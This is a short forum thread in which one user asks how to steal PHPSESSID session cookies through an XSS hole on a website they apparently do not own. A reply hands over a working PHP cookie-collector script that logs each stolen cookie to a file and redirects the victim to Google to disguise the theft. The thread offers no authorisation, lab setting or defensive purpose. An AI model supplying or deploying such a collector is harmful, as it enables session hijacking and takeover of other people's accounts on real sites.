PHPSESSID cookie stealer

Hey,

I noticed on hackersploit video web app pen testing #15 he mentioned he will upload the code for the PHP cookie stealer. I can’t seem to find it, I found a version of one on GitHub but it’s not working. It’s displaying some of the info except the PHPSESSID. Any tips?

P.s I have found a vuln website for xss, I can view the PHPSESSID info on the site, but when I send it to my server it doesn’t arrive. HttpOnly flag isn’t on either.

Thanks

Well, here is the code for a php cookie stealer that I made it will put everything on a log.txt file here it is

<?php 
$logFile = "log.txt"; 
$cookie = $_REQUEST["c"];

$handle = fopen($logFile, "a"); 
fwrite($handle, $cookie . "\n\n"); 
fclose($handle);

header("Location: http://www.google.com/"); 
exit; 
?>